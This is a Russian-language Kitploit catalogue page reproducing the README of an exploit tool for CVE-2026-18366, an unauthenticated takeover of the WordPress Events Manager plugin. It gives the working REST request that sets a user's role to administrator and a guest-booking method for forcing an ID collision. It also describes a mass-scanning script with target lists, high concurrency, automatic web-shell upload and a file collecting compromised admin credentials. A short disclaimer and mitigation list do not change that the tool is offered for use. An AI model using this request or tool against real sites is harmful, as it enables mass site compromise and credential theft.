Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/nxploited/cve-2026-18366
Повышение привилегийСканеры веб-уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииПост-эксплуатация
GitHubnxploited/cve-2026-18366

CVE-2026-18366

Events Manager < 7.4.1 — Неаутентифицированное повышение привилегий до администратора

Репозиторий
1124 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-18366

Events Manager < 7.4.1 — Неаутентифицированное повышение привилегий до администратора

CVE CVSS WordPress

Typing SVG


🔗 Будьте в курсе

Telegram

Актуальные zero-day уязвимости, эксплойты и исследования в области безопасности

Telegram Channel


📋 Обзор уязвимости


🔍 Техническое описание

Анализ первопричины

Уязвимость находится в EM\Archetypes::map_meta_cap внутри classes/em-archetypes.php. Плагин некорректно ограничивает область сопоставления прав (capability mapping), а именно:

  1. Воспринимает ЛЮБОЙ ID объекта как ID записи (post)
  2. Если запись является CPT event или location, он обнуляет $caps = []
  3. Никогда не восстанавливает права для edit_user, delete_user или promote_user
  4. Пустые права → has_cap() возвращает true, в том числе для пользователя 0 (гостя)

Вектор атаки

root@kitploit:~
POST|PUT|PATCH  /wp-json/wp/v2/users/{id}
POST            /index.php?rest_route=/wp/v2/users/{id}

Body: {"password":"...","roles":["administrator"]}

Условие: {id} должен совпадать с wp_posts.ID записи CPT event или location.

⚠️ Неаутентифицированный REST API не требует nonce (нет cookie авторизованного пользователя).

Эксплуатация через гостевые бронирования

Гостевые бронирования (dbem_bookings_anonymous=1 по умолчанию) создают реальных пользователей WP, что позволяет форсировать коллизию. Nonce бронирования находится в открытом доступе в формах событий.


🚀 Использование

Требования

root@kitploit:~
pip install aiohttp

Быстрый старт

root@kitploit:~
python CVE-2026-18366.py

Скрипт запросит следующие параметры:

  • list → путь к файлу со списком целей (по умолчанию: list.txt)
  • speed → количество одновременных потоков (по умолчанию: 10)

Параметры командной строки

root@kitploit:~
python CVE-2026-18366.py -l targets.txt -s 20 --timeout 30
ОпцияОписание
-l, --listПуть к файлу с URL целей
-s, --speedКоличество одновременных потоков (1-200)
--timeoutТайм-аут запроса в секундах (по умолчанию: 20)

Формат списка целей

Создайте файл list.txt с одной целью в каждой строке:

root@kitploit:~
https://target1.com
https://target2.com/wordpress
http://target3.com
target4.com

📊 Вывод

Вывод в консоль

root@kitploit:~
[+] [HH:MM:SS] target.com  ADMIN  username:password  uid=X  path
[+] [HH:MM:SS] target.com  SHELL  https://target.com/wp-content/plugins/...

Файл с результатами

Успешно скомпрометированные цели сохраняются в файл adminS.txt:

root@kitploit:~
https://target.com | username:Nx_admin_@!KSA | uid=X | path=id-collision | ADMIN | shell_url

🔄 Схема эксплуатации

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│                    CVE-2026-18366 Flow                          │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  ┌──────────┐    ┌─────────────┐    ┌──────────────────────┐   │
│  │  Detect  │ →  │ Collect IDs │ →  │  PATH A: ID Brute    │   │
│  │  Plugin  │    │  (CPT/HTML) │    │  REST /users/{id}    │   │
│  └──────────┘    └─────────────┘    └──────────┬───────────┘   │
│                                                 │               │
│                                          ┌──────▼──────┐        │
│                                          │   Success?  │        │
│                                          └──────┬──────┘        │
│                                       No │      │ Yes           │
│                               ┌──────────▼──────▼──────────┐    │
│                               │                            │    │
│  ┌──────────────────────┐     │    ┌─────────────────┐     │    │
│  │  PATH B: Guest Book  │ ←───┘    │  Login + Verify │     │    │
│  │  Create user until   │          │  Admin Access   │     │    │
│  │  user_id == post_id  │          └────────┬────────┘     │    │
│  └──────────────────────┘                   │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │  Upload Shell   │     │    │
│                                    │  (Plugin/Theme) │     │    │
│                                    └────────┬────────┘     │    │
│                                             │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │   Save Results  │     │    │
│                                    │   adminS.txt    │     │    │
│                                    └─────────────────┘     │    │
│                                                            │    │
└────────────────────────────────────────────────────────────────┘

⚙️ Возможности

  • Асинхронная архитектура → высокопроизводительное параллельное сканирование
  • Два пути атаки → коллизия ID + эксплуатация гостевых бронирований
  • Автоматическая загрузка шелла → развёртывание веб-шелла в плагине/теме
  • Определение версии → автоматическое определение уязвимой версии
  • Умное перечисление имён пользователей → несколько техник перечисления
  • Проверка входа → валидация через cookie + XML-RPC
  • Повышение привилегий → автоматическое повышение до администратора

📁 Структура файлов

root@kitploit:~
├── CVE-2026-18366.py    # Main exploit script
├── list.txt             # Target URLs (create this)
├── adminS.txt           # Successful results (auto-created)
└── README.md            # This documentation

⚠️ Отказ от ответственности

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║                                                                  ║
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║                                                                  ║
║  • Only use on systems you own or have explicit permission      ║
║  • Unauthorized access to computer systems is ILLEGAL           ║
║  • The author is NOT responsible for any misuse or damage       ║
║  • By using this tool, you agree to these terms                 ║
║                                                                  ║
║  Use responsibly. Stay ethical. Respect the law.                ║
║                                                                  ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ Меры защиты

Если вы администратор WordPress:

  1. Обновите Events Manager до версии 7.4.1 или новее
  2. Проверьте учётные записи пользователей на предмет несанкционированных изменений
  3. Просмотрите журналы доступа на предмет подозрительной активности REST API
  4. Внедрите правила WAF для фильтрации вредоносных запросов

👤 Автор

Nxploited (Khaled Alenzi)

Telegram


Исследования в области безопасности • Этичный хакинг • Поиск zero-day уязвимостей

Скачать инструмент
АтрибутДетали
CVE IDCVE-2026-18366
Серьёзность🔴 КРИТИЧЕСКИЙ (CVSS 9.8)
ПлагинEvents Manager для WordPress
Затронутые версии< 7.4.1
Тип уязвимостиНеаутентифицированное повышение привилегий
Вектор атакиСеть
Требуется аутентификацияНет